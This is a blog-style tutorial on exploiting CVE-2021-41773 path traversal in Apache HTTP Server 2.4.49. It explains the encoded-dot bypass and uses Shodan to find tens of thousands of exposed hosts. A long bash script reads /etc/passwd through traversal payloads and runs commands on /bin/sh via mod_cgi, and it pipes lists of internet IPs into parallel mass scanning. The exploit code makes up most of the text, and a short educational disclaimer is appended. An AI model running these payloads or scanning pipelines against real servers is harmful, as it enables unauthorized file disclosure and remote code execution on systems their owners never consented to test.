Finding and Exploiting Path Traversal in Apache HTTP Server 2.4.49 [CVE-2021-41773]

On October 4th, 2021, Apache disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, tracked as CVE-2021-41773. At the same time Apache released a fix in version 2.4.50 (that fix later turned out to be incomplete, and 2.4.50 itself was patched in 2.4.51 under CVE-2021-42013). The bug sits in the path normalization code that was rewritten for 2.4.49: a traversal segment written with a URL-encoded dot, such as .%2e/, is not collapsed the way a literal ../ is, so an attacker can walk out of the configured directory and read files outside the document root whenever they are not covered by the usual Require all denied. The bypass looks something like this: a request for /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd is decoded on the server to ../../../../etc/passwd.

It is also possible to get remote code execution (RCE) if mod_cgi is enabled, because the same traversal can reach an interpreter such as /bin/sh through the /cgi-bin/ alias and have it executed as a CGI script. Modern web stacks rarely use mod_cgi any more, but older sites built on older technology still do. Exploitation is easy and can be done with curl alone. Let's see how we can find websites running this Apache version. We will use our favourite search engine, Shodan. With a simple query for the Apache/2.4.49 server banner we can find potentially vulnerable hosts.

We got 78,219 results. Those servers report Apache 2.4.49, but a version banner alone does not prove a host is vulnerable (the traversal needs a directory that is not protected by Require all denied, and banners can be stale or faked), so we need to filter out the ones that actually are. We can do that with bash by wrapping the exploit in a script. The exploit with curl looks like this.

This only exploits the server and shows us the contents of /etc/passwd. Let's turn it into a detection script that reports whether a host is vulnerable.

Now let's download the results from Shodan. But our script takes one argument at a time, so how do we feed it many targets?

We can pull the IP addresses out of the downloaded results with a regex.

With all the IPs stored in ip.txt, let's scan them for the vulnerability with our bash script and xargs.

We can use httprobe to detect whether each target speaks HTTP or HTTPS; it prints a working http:// or https:// URL for every host that answers.

For bug hunters: you can run the same process over all the subdomains you have collected.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash detect.sh | tee -a result.txt

(detect.sh stands for the detection script written above, whatever you named it; without a script name bash would try to execute the URL itself as a file. xargs hands each http:// or https:// URL from httprobe to the script as its first argument, ten at a time.)
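Here is the whole procedure above (the .%2e encoding bypass, the curl check, the IP extraction from the Shodan export, and the parallel httprobe/xargs scan) as one added bash script. It is my own example, not the author's script or any Apache code. It assumes GNU grep and awk, curl and httprobe on PATH, and a Shodan export saved as shodan.json; the file names, the traversal depth of four, and the embedded Shodan lines are assumptions (the IPs are documentation ranges), and the POST to /bin/sh is the publicly documented mod_cgi check for this CVE. Run it only against hosts you are authorized to test.

```shell
#!/usr/bin/env bash
# Added example (not the original post's code): CVE-2021-41773 detection pipeline.
# Assumptions: GNU grep/awk, curl and httprobe installed; shodan.json, ip.txt and
# result.txt are illustrative file names; only probe hosts you are authorized to test.
set -u

# Traversal depth and target file for the read check (4 levels is enough to
# reach / from the usual /usr/lib/cgi-bin or /var/www/cgi-bin alias).
TRAVERSAL_DEPTH=4
FILE_TARGET="etc/passwd"

# Public CVE-2021-41773 payload: ".%2e" is a dot followed by a URL-encoded dot.
# The normalizer rewritten for 2.4.49 did not collapse it like a literal "..",
# so each segment becomes "../" once decoded. /cgi-bin/ is the start directory
# because the alias is reachable while "/" is denied by the default config.
build_payload() {   # build_payload <depth> <file-relative-to-root>
    local depth="$1" target="$2" path="/cgi-bin/" i=0
    while [ "$i" -lt "$depth" ]; do
        path="${path}.%2e/"
        i=$((i + 1))
    done
    printf '%s%s' "$path" "$target"
}

# True if a response body looks like a real /etc/passwd (root entry with uid 0).
# Checking the body instead of the HTTP status avoids counting "200 OK" error
# pages and honeypots as hits.
is_passwd_leak() {  # is_passwd_leak <body>
    printf '%s' "$1" | grep -qE '^root:[^:]*:0:0:'
}

# True if a body contains the output of `id`, i.e. the mod_cgi RCE check worked.
is_rce_output() {   # is_rce_output <body>
    printf '%s' "$1" | grep -qE 'uid=[0-9]+\('
}

# Probe one base URL such as http://203.0.113.10 (httprobe output format).
# --path-as-is keeps curl from rewriting the path; -k accepts self-signed certs.
check_host() {      # check_host <base-url>
    local base="${1%/}" body
    body=$(curl -sk --path-as-is -m 10 \
        "${base}$(build_payload "$TRAVERSAL_DEPTH" "$FILE_TARGET")" 2>/dev/null)
    if is_passwd_leak "$body"; then
        # Only when traversal works: the publicly documented mod_cgi check, which
        # POSTs a shell one-liner to /bin/sh reached through the same traversal.
        body=$(curl -sk --path-as-is -m 10 -X POST \
            --data 'echo Content-Type: text/plain; echo; id' \
            "${base}$(build_payload "$TRAVERSAL_DEPTH" "bin/sh")" 2>/dev/null)
        if is_rce_output "$body"; then
            printf 'VULNERABLE (file read + mod_cgi RCE): %s\n' "$base"
        else
            printf 'VULNERABLE (file read): %s\n' "$base"
        fi
    else
        printf 'not vulnerable: %s\n' "$base"
    fi
}

# Unique IPv4 addresses from a Shodan export on stdin, whatever its layout.
# The regex alone also matches things like 999.1.1.1, so awk drops any octet > 255.
extract_ips() {
    grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' \
        | awk -F. '$1 <= 255 && $2 <= 255 && $3 <= 255 && $4 <= 255' \
        | LC_ALL=C sort -u
}

# Constructed sample of what a Shodan JSON export contains (documentation IPs).
SAMPLE_SHODAN='{"ip_str": "203.0.113.10", "port": 80, "product": "Apache httpd", "version": "2.4.49"}
{"ip_str": "198.51.100.7", "port": 443, "product": "Apache httpd", "version": "2.4.49"}
{"ip_str": "203.0.113.10", "port": 8080, "product": "Apache httpd", "version": "2.4.49"}
{"ip_str": "999.1.1.1", "note": "junk line that the regex alone would accept"}'

# Fan out over a host list: httprobe decides http vs https, xargs runs 10 checks
# in parallel, one URL per call. export -f makes the functions visible to the
# bash -c children (bash-specific).
scan_list() {       # scan_list <hosts-file> <results-file>
    export -f build_payload is_passwd_leak is_rce_output check_host
    export TRAVERSAL_DEPTH FILE_TARGET
    httprobe < "$1" | xargs -n1 -P10 bash -c 'check_host "$1"' _ | tee -a "$2"
}

# Typical run:
#   printf '%s\n' "$SAMPLE_SHODAN" | extract_ips     # or: extract_ips < shodan.json > ip.txt
#   scan_list ip.txt result.txt
```

Two caveats when using this against Shodan data: httprobe only tries ports 80 and 443 by default, while many of the 2.4.49 hits sit on other ports, so pass extra probes with httprobe's -p flag (for example -p http:8080) if you want those covered; and the check above looks only for the single-encoded .%2e form, so a 2.4.50 host that is still vulnerable through the double-encoded .%%32%65 variant of CVE-2021-42013 will be reported as not vulnerable.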

[This article is for educational and research purposes only; we do not encourage harming others' property without permission.]



Joy Ghosh
Security Researcher | CTF Player | Web-Application Pen-tester | Programmer